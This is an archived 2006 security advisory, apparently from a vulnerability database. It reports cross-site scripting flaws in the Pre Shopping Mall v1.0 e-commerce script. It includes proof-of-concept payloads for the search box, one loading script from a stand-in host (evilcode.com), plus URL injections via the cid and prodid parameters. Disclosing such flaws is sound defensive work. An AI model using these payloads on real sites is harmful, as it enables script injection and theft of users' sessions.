Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12821
HistoryMay 26, 2006 - 12:00 a.m.

Pre Shopping Mall v1.0

2006-05-2600:00:00
vulners.com
28

Pre Shopping Mall

Homepage:
http://www.preprojects.com/emall.asp

Description:
PRE SHOPPING MALL a power full ecommerce shopping mall solution. If you need to setup a online shop or
shopping mall PRE SHOPPING MALL is your quickest solution. You can setup your Emall within few hours. Buy
install and start selling your products. Very easy to installs and manage powerful administration. Receive
payments either through Paypal or Authorize.net. Quickest solution for your online business.

Effected files:
search box.
detail.php
products.php

Exploits & Vulns:

XSS Vulnerabilities:

The search and login box does not sanatize user input before generating it dynamically. This could cause
XSS.

For proof of concept just try putting this in the search box:
'';!–"<XSS>=&{()}'';!–"<XSS>=&{()}<SCRIPT
SRC=http://www.evilcode.com/xss.js&gt;&lt;/SCRIPT&gt;&#39;&#39;;!--&quot;&lt;XSS&gt;=&amp;{&#40;&#41;}&#39;&#39;;!--&quot;

<XSS>=&{()}

More XSS Vulns:
For the XSS examples we'll use url injection with the tag: <IMG%20SRC=javascript:alert('XSS')>
http://www.example.com/emall/products.php?cid=[XSS]
http://www.example.com/emall/detail.php?prodid=[XSS]